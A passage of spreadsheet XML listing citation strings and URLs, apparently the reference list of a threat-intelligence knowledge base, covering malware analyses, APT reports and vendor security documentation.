    <t>Sharma, R. (2018, August 15). Revamped jRAT Uses New Anti-Parsing Techniques. Retrieved September 21, 2018.</t>
  </si>
  <si>
    <t>Dennis German. (2020, November 20). launchd Keywords for plists. Retrieved October 7, 2021.</t>
  </si>
  <si>
    <t>RISKIQ. (2017, December 20). Mining Insights: Infrastructure Analysis of Lazarus Group Cyber Attacks on the Cryptocurrency Industry. Retrieved July 29, 2022.</t>
  </si>
  <si>
    <t>D. Baron, T. Klausner. (2020). libzip. Retrieved February 20, 2020.</t>
  </si>
  <si>
    <t>Jaron Bradley. (2021, November 14). What does APT Activity Look Like on macOS?. Retrieved January 19, 2022.</t>
  </si>
  <si>
    <t>Apple. (n.d.). Foundation. Retrieved July 1, 2020.</t>
  </si>
  <si>
    <t>Tenon. (n.d.). Retrieved October 12, 2021.</t>
  </si>
  <si>
    <t>Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump. Retrieved August 20, 2021.</t>
  </si>
  <si>
    <t>Massachusetts Institute of Technology. (2007, October 27). Kerberos for Macintosh Preferences Documentation. Retrieved October 6, 2021.</t>
  </si>
  <si>
    <t>Nick Miles. (2017, November 30). Detecting macOS High Sierra root account without authentication. Retrieved September 20, 2021.</t>
  </si>
  <si>
    <t>Reynolds, James. (2016, April 7). What is emond?. Retrieved September 10, 2019.</t>
  </si>
  <si>
    <t>Michael Kerrisk. (2021, August 27). mailx(1p) — Linux manual page. Retrieved June 10, 2022.</t>
  </si>
  <si>
    <t>Lawrence Abrams. (2004, September 10). How Malware hides and is installed as a Service. Retrieved August 30, 2021.</t>
  </si>
  <si>
    <t>Thomas Reed. (2020, April 21). OSX.DubRobber. Retrieved October 5, 2021.</t>
  </si>
  <si>
    <t>ARMmbed. (2018, June 21). Mbed Crypto. Retrieved February 15, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (2021, August 5). HKLM\SYSTEM\CurrentControlSet\Services Registry Tree. Retrieved August 25, 2021.</t>
  </si>
  <si>
    <t>praetorian Editorial Team. (2014, August 19). Man-in-the-Middle TLS Protocol Downgrade Attack. Retrieved December 8, 2021.</t>
  </si>
  <si>
    <t>Boxiner, A., Vaknin, E. (2019, June 11). Microsoft Management Console (MMC) Vulnerabilities. Retrieved September 24, 2021.</t>
  </si>
  <si>
    <t>Robert Kugler. (2012, November 20). Mozilla Foundation Security Advisory 2012-98. Retrieved March 10, 2017.</t>
  </si>
  <si>
    <t>Warren, R. (2017, August 8). Smuggling HTA files in Internet Explorer/Edge. Retrieved May 20, 2021.</t>
  </si>
  <si>
    <t>Irwin, Ullrich, J. (2009, March 16). new rogue-DHCP server malware. Retrieved January 14, 2022.</t>
  </si>
  <si>
    <t>Symantec Threat Hunter Team. (2021, December 16). Noberus: Technical Analysis Shows Sophistication of New Rust-based Ransomware. Retrieved January 14, 2022.</t>
  </si>
  <si>
    <t>Vivek Gite. (2014, September 17). Linux Password Cracking: Explain unshadow and john Commands (John the Ripper Tool). Retrieved February 19, 2020.</t>
  </si>
  <si>
    <t>Mollema, D. (2019, March 4). The worst of both worlds: Combining NTLM Relaying and Kerberos delegation . Retrieved August 15, 2022.</t>
  </si>
  <si>
    <t>Patrick Wardle. (n.d.). Retrieved March 20, 2018.</t>
  </si>
  <si>
    <t>Patrick Wardle. (2018, January 11). Ay MaMi. Retrieved March 19, 2018.</t>
  </si>
  <si>
    <t>Wardle, Patrick. (2018, December 20). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 1). Retrieved October 3, 2019.</t>
  </si>
  <si>
    <t>Wardle, Patrick. (2019, January 15). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 2). Retrieved October 3, 2019.</t>
  </si>
  <si>
    <t>Patrick Wardle. (2020, August 30). Apple Approved Malware malicious code ...now notarized!? #2020. Retrieved September 13, 2021.</t>
  </si>
  <si>
    <t>Patrick Wardle. (2018, July 23). Block Blocking Login Items. Retrieved October 1, 2021.</t>
  </si>
  <si>
    <t>Patrick Wardle. (n.d.). Mac Malware of 2017. Retrieved September 21, 2018.</t>
  </si>
  <si>
    <t>Patrick Wardle. (2019, June 20). Burned by Fire(fox). Retrieved October 1, 2021.</t>
  </si>
  <si>
    <t>okta. (n.d.). What Happens If Your JWT Is Stolen?. Retrieved September 12, 2019.</t>
  </si>
  <si>
    <t>decalage2. (2019, December 3). python-oletools. Retrieved September 18, 2020.</t>
  </si>
  <si>
    <t>Ray, V., et al. (2016, November 22). Tropic Trooper Targets Taiwanese Government and Fossil Fuel Provider With Poison Ivy. Retrieved December 18, 2020.</t>
  </si>
  <si>
    <t>Passcape. (n.d.). Windows Password Recovery - Vault Explorer and Decoder. Retrieved November 24, 2020.</t>
  </si>
  <si>
    <t>Bontchev, V. (2019, July 30). pcodedmp.py - A VBA p-code disassembler. Retrieved September 17, 2020.</t>
  </si>
  <si>
    <t>Phobos Ransomware. (2020, December 30). Phobos Ransomware, Fast.exe. Retrieved September 20, 2021.</t>
  </si>
  <si>
    <t>Antonio Piazza (4n7m4n). (2021, November 23). Defeating Malicious Launch Persistence. Retrieved April 19, 2022.</t>
  </si>
  <si>
    <t>Jason Gerend. (2017, October 16). pubprn. Retrieved July 23, 2021.</t>
  </si>
  <si>
    <t>Thomas Reed. (2020, July 7). Mac ThiefQuest malware may not be ransomware after all. Retrieved March 22, 2021.</t>
  </si>
  <si>
    <t>Droms, R. (1997, March). Dynamic Host Configuration Protocol. Retrieved March 9, 2022.</t>
  </si>
  <si>
    <t>J. Bound, et al. (2003, July). Dynamic Host Configuration Protocol for IPv6 (DHCPv6). Retrieved June 27, 2022.</t>
  </si>
  <si>
    <t>Craig Rowland. (2019, July 25). Getting an Attacker IP Address from a Malicious Linux At Job. Retrieved October 15, 2021.</t>
  </si>
  <si>
    <t>Ariel silver. (2022, February 1). Defense Evasion Techniques. Retrieved April 8, 2022.</t>
  </si>
  <si>
    <t>Hanson, R. (2016, September 24). phishery. Retrieved July 21, 2018.</t>
  </si>
  <si>
    <t>Phil Stokes. (2020, November 5). Resourceful macOS Malware Hides in Named Fork. Retrieved October 12, 2021.</t>
  </si>
  <si>
    <t>Phil Stokes. (2020, December 2). APT32 Multi-stage macOS Trojan Innovates on Crimeware Scripting Technique. Retrieved September 13, 2021.</t>
  </si>
  <si>
    <t>Stokes, Phil. (2019, June 17). HOW MALWARE PERSISTS ON MACOS. Retrieved September 10, 2019.</t>
  </si>
  <si>
    <t>Phil Stokes. (2020, September 8). Coming Out of Your Shell: From Shlayer to ZShlayer. Retrieved September 13, 2021.</t>
  </si>
  <si>
    <t>Michael Kerrisk. (2017, September 15). Linux Programmer's Manual. Retrieved September 21, 2018.</t>
  </si>
  <si>
    <t>Shoemaker, E. (2015, December 31). Solution: Monitor DHCP Scopes and Detect Man-in-the-Middle Attacks with PRTG and PowerShell. Retrieved March 7, 2022.</t>
  </si>
  <si>
    <t>Torbjorn Granlund, Richard M. Stallman. (2020, March null). split(1) — Linux manual page. Retrieved March 25, 2022.</t>
  </si>
  <si>
    <t>Damele, B., Stampar, M. (n.d.). sqlmap. Retrieved March 19, 2018.</t>
  </si>
  <si>
    <t>Microsoft. (2021, October 28). Store passwords using reversible encryption. Retrieved January 3, 2022.</t>
  </si>
  <si>
    <t>Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET Profilers. Retrieved June 24, 2020.</t>
  </si>
  <si>
    <t>Todd C. Miller. (2018). Sudo Man Page. Retrieved March 19, 2018.</t>
  </si>
  <si>
    <t>Patrick Wardle. (2017, January 1). Mac Malware of 2016. Retrieved September 21, 2018.</t>
  </si>
  <si>
    <t>LOLBAS. (n.d.). LOLBAS Mapped to T1105. Retrieved March 11, 2022.</t>
  </si>
  <si>
    <t>Erika Noerenberg. (2020, June 29). TAU Threat Analysis: Bundlore (macOS) mm-install-macos. Retrieved October 12, 2021.</t>
  </si>
  <si>
    <t>Alashwali, E. S., Rasmussen, K. (2019, January 26). What's in a Downgrade? A Taxonomy of Downgrade Attacks in the TLS Protocol and Application Protocols Using TLS. Retrieved December 7, 2021.</t>
  </si>
  <si>
    <t>Csaba Fitzl. (2021, June 29). GateKeeper - Not a Bypass (Again). Retrieved September 22, 2021.</t>
  </si>
  <si>
    <t>Team Cinnamon. (2017, February 3). Downgrade Attacks. Retrieved December 9, 2021.</t>
  </si>
  <si>
    <t>Mac Threat Response, Mobile Research Team. (2020, August 13). The XCSSET Malware: Inserts Malicious Code Into Xcode Projects, Performs UXSS Backdoor Planting in Safari, and Leverages Two Zero-day Exploits. Retrieved October 5, 2021.</t>
  </si>
  <si>
    <t>Trend Micro. (2012, October 9). TROJ_ZEGOST. Retrieved September 2, 2021.</t>
  </si>
  <si>
    <t>Malhotra, A., Thattil, J. et al. (2022, March 29). Transparent Tribe campaign uses new bespoke malware to target Indian government officials . Retrieved September 6, 2022.</t>
  </si>
  <si>
    <t>Malhotra, A., McKay, K. et al. (2021, May 13). Transparent Tribe APT expands its Windows malware arsenal . Retrieved July 29, 2022.</t>
  </si>
  <si>
    <t>Tu, L. Ma, Y. Ye, G. (2020, October 1). Ttint: An IoT Remote Access Trojan spread through 2 0-day vulnerabilities. Retrieved October 28, 2021.</t>
  </si>
  <si>
    <t>VerSprite. (2018, January 24). Exploiting VyprVPN for MacOS. Retrieved April 20, 2022.</t>
  </si>
  <si>
    <t>Adair, S., Lancaster, T., Volexity Threat Research. (2022, June 15). DriftingCloud: Zero-Day Sophos Firewall Exploitation and an Insidious Breach. Retrieved July 1, 2022.</t>
  </si>
  <si>
    <t>vxunderground. (2021, June 30). VX-API. Retrieved April 1, 2022.</t>
  </si>
  <si>
    <t>Symantec. (2009, March 22). W32.Tidserv.G. Retrieved January 14, 2022.</t>
  </si>
  <si>
    <t>Patrick Wardle. (2020, August 5). The Art of Mac Malware Volume 0x1: Analysis. Retrieved March 19, 2021.</t>
  </si>
  <si>
    <t>Patrick Wardle. (2022, January 1). The Art of Mac Malware Volume 0x1:Analysis. Retrieved April 19, 2022.</t>
  </si>
  <si>
    <t>Patrick Wardle. (2020, June 29). OSX.EvilQuest Uncovered part i: infection, persistence, and more!. Retrieved March 18, 2021.</t>
  </si>
  <si>
    <t>Patrick Wardle. (2020, July 3). OSX.EvilQuest Uncovered part ii: insidious capabilities. Retrieved March 21, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (2020, September 27). What is Microsoft Management Console?. Retrieved October 5, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (2021, July 2). Use attack surface reduction rules to prevent malware infection. Retrieved June 24, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (2018, May 31). CLSID Key. Retrieved September 24, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (2017, October 16). mmc. Retrieved September 20, 2021.</t>
  </si>
  <si>
    <t>Brinkmann, M.. (2017, June 10). Windows .msc files overview. Retrieved September 20, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (2017, October 16). wbadmin delete catalog. Retrieved September 20, 2021.</t>
  </si>
  <si>
    <t>Forensics Wiki. (2021, June 19). Windows XML Event Log (EVTX). Retrieved September 13, 2021.</t>
  </si>
  <si>
    <t>Rayaprolu, A.. (2011, April 12). xCmd an Alternative to PsExec. Retrieved August 10, 2016.</t>
  </si>
  <si>
    <t>Chris Ross. (2019, February 8). No Place Like Chrome. Retrieved April 27, 2021.</t>
  </si>
  <si>
    <t>Ross, Chris. (2018, January 17). Leveraging Emond on macOS For Persistence. Retrieved September 10, 2019.</t>
  </si>
  <si>
    <t>Guarnieri, C. (2015, June 19). Digital Attack on German Parliament: Investigative Report on the Hack of the Left Party Infrastructure in Bundestag. Retrieved January 22, 2018.</t>
  </si>
  <si>
    <t>https://0x00sec.org/t/super-stealthy-droppers/3715</t>
  </si>
  <si>
    <t>https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/</t>
  </si>
  <si>
    <t>https://blog.360totalsecurity.com/en/apt-c-43-steals-venezuelan-military-secrets-to-provide-intelligence-support-for-the-reactionaries-hpreact-campaign/</t>
  </si>
  <si>
    <t>https://401trg.github.io/pages/burning-umbrella.html</t>
  </si>
  <si>
    <t>https://www.7-zip.org/</t>
  </si>
  <si>
    <t>https://o365blog.com/aadinternals/</t>
  </si>
  <si>
    <t>https://o365blog.com/post/bprt/</t>
  </si>
  <si>
    <t>https://o365blog.com/post/mdm</t>
  </si>
  <si>
    <t>https://o365blog.com/post/devices/</t>
  </si>
  <si>
    <t>https://o365blog.com/post/on-prem_admin/</t>
  </si>
  <si>
    <t>https://o365blog.com/aadinternals</t>
  </si>
  <si>
    <t>https://github.com/Gerenios/AADInternals</t>
  </si>
  <si>
    <t>https://o365blog.com/post/federation-vulnerability/</t>
  </si>
  <si>
    <t>https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf</t>
  </si>
  <si>
    <t>https://adds-security.blogspot.fr/2018/02/detecter-dcshadow-impossible.html</t>
  </si>
  <si>
    <t>https://adsecurity.org/?p=556</t>
  </si>
  <si>
    <t>https://adsecurity.org/?p=1515</t>
  </si>
  <si>
    <t>https://adsecurity.org/?p=2288</t>
  </si>
  <si>
    <t>https://adsecurity.org/?p=2716</t>
  </si>
  <si>
    <t>https://adsecurity.org/?p=227</t>
  </si>
  <si>
    <t>https://adsecurity.org/?p=483</t>
  </si>
  <si>
    <t>https://adsecurity.org/?p=1729</t>
  </si>
  <si>
    <t>https://adsecurity.org/?p=2011</t>
  </si>
  <si>
    <t>https://adsecurity.org/?p=3299</t>
  </si>
  <si>
    <t>https://www.amd.com/system/files/TechDocs/20213.pdf</t>
  </si>
  <si>
    <t>https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-011.pdf</t>
  </si>
  <si>
    <t>https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf</t>
  </si>
  <si>
    <t>https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf</t>
  </si>
  <si>
    <t>https://web.archive.org/web/20180615122133/https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/</t>
  </si>
  <si>
    <t>https://attack.mitre.org/docs/APT3_Adversary_Emulation_Plan.pdf</t>
  </si>
  <si>
    <t>https://arstechnica.com/information-technology/2017/04/researchers-claim-china-trying-to-hack-south-korea-missile-defense-efforts/</t>
  </si>
  <si>
    <t>https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.88_ENG.pdf</t>
  </si>
  <si>
    <t>https://www.arbornetworks.com/blog/asert/donot-team-leverages-new-modular-malware-framework-south-asia/</t>
  </si>
  <si>
    <t>https://asert.arbornetworks.com/innaput-actors-utilize-remote-access-trojan-since-2016-presumably-targeting-victim-files/</t>
  </si>
  <si>
    <t>https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf</t>
  </si>
  <si>
    <t>https://cybersecurity.att.com/blogs/labs-research/lazarus-campaign-ttps-and-evolution</t>
  </si>
  <si>
    <t>https://cybersecurity.att.com/blogs/labs-research/the-rise-of-qakbot</t>
  </si>
  <si>
    <t>https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks</t>
  </si>
  <si>
    <t>https://cdn-cybersecurity.att.com/docs/global-perspective-of-the-sidewinder-apt.pdf</t>
  </si>
  <si>
    <t>https://cybersecurity.att.com/blogs/labs-research/teamtnt-with-new-campaign-aka-chimaera</t>
  </si>
  <si>
    <t>https://aws.amazon.com/blogs/security/newly-updated-features-in-the-aws-iam-console-help-you-adhere-to-iam-best-practices/</t>
  </si>
  <si>
    <t>https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html</t>
  </si>
  <si>
    <t>https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/</t>
  </si>
  <si>
    <t>https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-event-reference-aws-console-sign-in-events.html</t>
  </si>
  <si>
    <t>https://docs.aws.amazon.com/IAM/latest/UserGuide/id_users_create.html</t>
  </si>
  <si>
    <t>https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html</t>
  </si>
  <si>
    <t>https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ebs-modifying-snapshot-permissions.html</t>
  </si>
  <si>
    <t>https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetBucketAcl.html</t>
  </si>
  <si>
    <t>https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html</t>
  </si>
  <si>
    <t>https://docs.aws.amazon.com/IAM/latest/APIReference/API_GetAccountPasswordPolicy.html</t>
  </si>
  <si>
    <t>https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html</t>
  </si>
  <si>
    <t>https://docs.aws.amazon.com/IAM/latest/UserGuide/access_policies.html</t>
  </si>
  <si>
    <t>https://aws.amazon.com/identity/federation/</t>
  </si>
  <si>
    <t>https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html</t>
  </si>
  <si>
    <t>https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html</t>
  </si>
  <si>
    <t>https://blog.xpnsec.com/aws-lambda-redirector/</t>
  </si>
  <si>
    <t>https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html</t>
  </si>
  <si>
    <t>https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html</t>
  </si>
  <si>
    <t>https://docs.aws.amazon.com/IAM/latest/UserGuide/cloudtrail-integration.html</t>
  </si>
  <si>
    <t>https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html</t>
  </si>
  <si>
    <t>https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html</t>
  </si>
  <si>
    <t>https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp_request.html</t>
  </si>
  <si>
    <t>https://docs.aws.amazon.com/vpc/latest/mirroring/traffic-mirroring-how-it-works.html</t>
  </si>
  <si>
    <t>http://www.uefi.org/about</t>
  </si>
  <si>
    <t>https://www.accenture.com/t20180127T003755Z_w_/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf</t>
  </si>
  <si>
    <t>https://www.accenture.com/t20180423T055005Z_w_/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf</t>
  </si>
  <si>
    <t>https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity</t>
  </si>
  <si>
    <t>https://www.accenture.com/us-en/blogs/cyber-defense/iran-based-lyceum-campaigns</t>
  </si>
  <si>
    <t>https://www.accenture.com/us-en/blogs/cyber-defense/mudcarps-focus-on-submarine-technologies</t>
  </si>
  <si>
    <t>https://www.accenture.com/t20181129T203820Z__w__/us-en/_acnmedia/PDF-90/Accenture-snakemackerel-delivers-zekapab-malware.pdf#zoom=50</t>
  </si>
  <si>
    <t>https://arstechnica.com/information-technology/2014/06/active-malware-operation-let-attackers-sabotage-us-energy-industry/</t>
  </si>
  <si>
    <t>https://adsecurity.org/?p=2293</t>
  </si>
  <si>
    <t>https://adsecurity.org/?p=1588</t>
  </si>
  <si>
    <t>https://adsecurity.org/?p=1640</t>
  </si>
  <si>
    <t>https://adsecurity.org/?p=1772</t>
  </si>
  <si>
    <t>https://gist.github.com/kaloprominat/6111584</t>
  </si>
  <si>
    <t>http://msdn.microsoft.com/en-us/library/dd183341</t>
  </si>
  <si>
    <t>https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLoginItems.html</t>
  </si>
  <si>
    <t>https://www.adlice.com/userland-rootkits-part-1-iat-hooks/</t>
  </si>
  <si>
    <t>https://adsecurity.org/?page_id=1821</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/advanced-security-audit-policy-settings</t>
  </si>
  <si>
    <t>http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf</t>
  </si>
  <si>
    <t>http://download.ahnlab.com/global/brochure/[Analysis]Andariel_Group.pdf</t>
  </si>
  <si>
    <t>https://global.ahnlab.com/global/upload/download/techreport/[Analysis_Report]Operation%20Kabar%20Cobra.pdf</t>
  </si>
  <si>
    <t>http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family</t>
  </si>
  <si>
    <t>https://airbus-cyber-security.com/fileless-malware-behavioural-analysis-kovter-persistence/</t>
  </si>
  <si>
    <t>https://blogs.akamai.com/2018/01/a-death-match-of-domain-generation-algorithms.html</t>
  </si>
  <si>
    <t>https://github.com/LordNoteworthy/al-khaser/tree/master/al-khaser/AntiDebug</t>
  </si>
  <si>
    <t>https://www.youtube.com/watch?v=lDvf4ScWbcQ</t>
  </si>
  <si>
    <t>https://www.alienvault.com/open-threat-exchange/blog/another-sykipot-sample-likely-targeting-us-federal-agencies</t>
  </si>
  <si>
    <t>https://www.alienvault.com/open-threat-exchange/blog/sykipot-variant-hijacks-dod-and-windows-smart-cards</t>
  </si>
  <si>
    <t>http://blog.trendmicro.com/trendlabs-security-intelligence/kunming-attack-leads-to-gh0st-rat-variant/</t>
  </si>
  <si>
    <t>https://offsec.almond.consulting/UAC-bypass-dotnet.html</t>
  </si>
  <si>
    <t>https://web.archive.org/web/20200424075623/https:/www.crowdstrike.com/blog/deep-thought-chinese-targeting-national-security-think-tanks/</t>
  </si>
  <si>
    <t>http://blog.crowdstrike.com/adversary-tricks-crowdstrike-treats/</t>
  </si>
  <si>
    <t>https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp.html</t>
  </si>
  <si>
    <t>https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/AMIs.html</t>
  </si>
  <si>
    <t>https://aws.amazon.com</t>
  </si>
  <si>
    <t>https://aws.amazon.com/blogs/security/defense-in-depth-open-firewalls-reverse-proxies-ssrf-vulnerabilities-ec2-instance-metadata-service/</t>
  </si>
  <si>
    <t>https://docs.aws.amazon.com/vpc/latest/userguide/what-is-amazon-vpc.html</t>
  </si>
  <si>
    <t>https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html</t>
  </si>
  <si>
    <t>https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html</t>
  </si>
  <si>
    <t>https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html</t>
  </si>
  <si>
    <t>https://aws.amazon.com/s3/</t>
  </si>
  <si>
    <t>https://aws.amazon.com/premiumsupport/knowledge-center/secure-s3-resources/</t>
  </si>
  <si>
    <t>https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSSnapshots.html</t>
  </si>
  <si>
    <t>https://azure.microsoft.com/en-us/overview/what-is-a-virtual-machine/</t>
  </si>
  <si>
    <t>https://www.amnestyusa.org/wp-content/uploads/2021/02/Click-and-Bait_Vietnamese-Human-Rights-Defenders-Targeted-with-Spyware-Attacks.pdf</t>
  </si>
  <si>
    <t>https://www.amnesty.org/en/latest/research/2019/08/evolving-phishing-attacks-targeting-journalists-and-human-rights-defenders-from-the-middle-east-and-north-africa/</t>
  </si>
  <si>
    <t>http://www.ampliasecurity.com/research/wcefaq.html</t>
  </si>
  <si>
    <t>https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/</t>
  </si>
  <si>
    <t>https://www.anomali.com/blog/evasive-maneuvers-the-wekby-group-attempts-to-evade-analysis-via-custom-rop</t>
  </si>
  <si>
    <t>https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat</t>
  </si>
  <si>
    <t>https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations</t>
  </si>
  <si>
    <t>https://www.anomali.com/blog/anomali-suspects-that-china-backed-apt-pirate-panda-may-be-seeking-access-to-vietnam-government-data-center#When:15:00:00Z</t>
  </si>
  <si>
    <t>https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang</t>
  </si>
  <si>
    <t>https://www.anomali.com/blog/probable-iranian-cyber-actors-static-kitten-conducting-cyberespionage-campaign-targeting-uae-and-kuwait-government-agencies</t>
  </si>
  <si>
    <t>https://forum.anomali.com/t/credential-harvesting-and-malicious-file-delivery-using-microsoft-office-template-injection/2104</t>
  </si>
  <si>
    <t>https://arstechnica.com/tech-policy/2011/02/anonymous-speaks-the-inside-story-of-the-hbgary-hack/</t>
  </si>
  <si>
    <t>https://torrentfreak.com/anonymous-hackers-deface-russian-govt-site-to-protest-web-blocking-nsfw-180512/</t>
  </si>
  <si>
    <t>https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/</t>
  </si>
  <si>
    <t>https://www.programmersought.com/article/62493896999/</t>
  </si>
  <si>
    <t>https://any.run/cybersecurity-blog/time-bombs-malware-with-delayed-execution/</t>
  </si>
  <si>
    <t>https://support.microsoft.com/en-us/kb/197571</t>
  </si>
  <si>
    <t>https://msdn.microsoft.com/en-us/library/dn280412</t>
  </si>
  <si>
    <t>https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html</t>
  </si>
  <si>
    <t>https://support.apple.com/guide/security/app-security-overview-sec35dd877d0/1/web/1</t>
  </si>
  <si>
    <t>https://developer.apple.com/library/archive/documentation/AppleScript/Conceptual/AppleScriptLangGuide/introduction/ASLR_intro.html</t>
  </si>
  <si>
    <t>https://developer.apple.com/documentation/coreservices</t>
  </si>
  <si>
    <t>https://discussions.apple.com/thread/3991574</t>
  </si>
  <si>
    <t>https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf</t>
  </si>
  <si>
    <t>https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html</t>
  </si>
  <si>
    <t>https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/RunpathDependentLibraries.html</t>
  </si>
  <si>
    <t>https://developer.apple.com/documentation/security/hardened_runtime</t>
  </si>
  <si>
    <t>https://developer.apple.com/documentation/security/disabling_and_enabling_system_integrity_protection</t>
  </si>
  <si>
    <t>https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/OverviewOfDynamicLibraries.html</t>
  </si>
  <si>
    <t>https://developer.apple.com/support/kernel-extensions/</t>
  </si>
  <si>
    <t>https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt</t>
  </si>
  <si>
    <t>https://images.apple.com/remotedesktop/pdf/ARD_Admin_Guide_v3.3.pdf</t>
  </si>
  <si>
    <t>https://support.apple.com/en-us/HT203998</t>
  </si>
  <si>
    <t>https://developer.apple.com/library/archive/technotes/tn2459/_index.html</t>
  </si>
  <si>
    <t>https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins</t>
  </si>
  <si>
    <t>https://support.apple.com/HT208050</t>
  </si>
  <si>
    <t>https://developer.apple.com/documentation/security/1540038-authorizationexecutewithprivileg</t>
  </si>
  <si>
    <t>https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html</t>
  </si>
  <si>
    <t>https://redcanary.com/blog/mac-application-bundles/</t>
  </si>
  <si>
    <t>https://blog.aquasec.com/malicious-container-image-docker-container-host</t>
  </si>
  <si>
    <t>https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability</t>
  </si>
  <si>
    <t>https://info.aquasec.com/hubfs/Threat%20reports/AquaSecurity_Cloud_Native_Threat_Report_2021.pdf?utm_campaign=WP%20-%20Jun2021%20Nautilus%202021%20Threat%20Research%20Report&amp;utm_medium=email&amp;_hsmi=132931006&amp;_hsenc=p2ANqtz-_8oopT5Uhqab8B7kE0l3iFo1koirxtyfTehxF7N-EdGYrwk30gfiwp5SiNlW3G0TNKZxUcDkYOtwQ9S6nNVNyEO-Dgrw&amp;utm_content=132931006&amp;utm_source=hs_automation</t>
  </si>
  <si>
    <t>https://blog.aquasec.com/container-security-tnt-container-attack</t>
  </si>
  <si>
    <t>http://blog.trendmicro.com/trendlabs-security-intelligence/rarstone-found-in-targeted-attacks/</t>
  </si>
  <si>
    <t>https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf</t>
  </si>
  <si>
    <t>https://www.arbornetworks.com/blog/asert/musical-chairs-playing-tetris/</t>
  </si>
  <si>
    <t>https://www.netscout.com/blog/asert/ddos-attacks-ssl-something-old-something-new</t>
  </si>
  <si>
    <t>https://www.bleepingcomputer.com/news/security/malware-found-in-arch-linux-aur-package-repository/</t>
  </si>
  <si>
    <t>https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/</t>
  </si>
  <si>
    <t>https://arstechnica.com/information-technology/2017/03/hack-that-escapes-vm-by-exploiting-edge-browser-fetches-105000-at-pwn2own/</t>
  </si>
  <si>
    <t>https://arstechnica.com/information-technology/2015/03/massive-denial-of-service-attack-on-github-tied-to-chinese-government/</t>
  </si>
  <si>
    <t>https://arstechnica.com/information-technology/2020/08/intel-is-investigating-the-leak-of-20gb-of-its-source-code-and-private-data/</t>
  </si>
  <si>
    <t>https://arxiv.org/pdf/2102.04796.pdf</t>
  </si>
  <si>
    <t>https://atlas-cybersecurity.com/cyber-threats/threat-actors-use-search-engine-optimization-tactics-to-redirect-traffic-and-install-malware/</t>
  </si>
  <si>
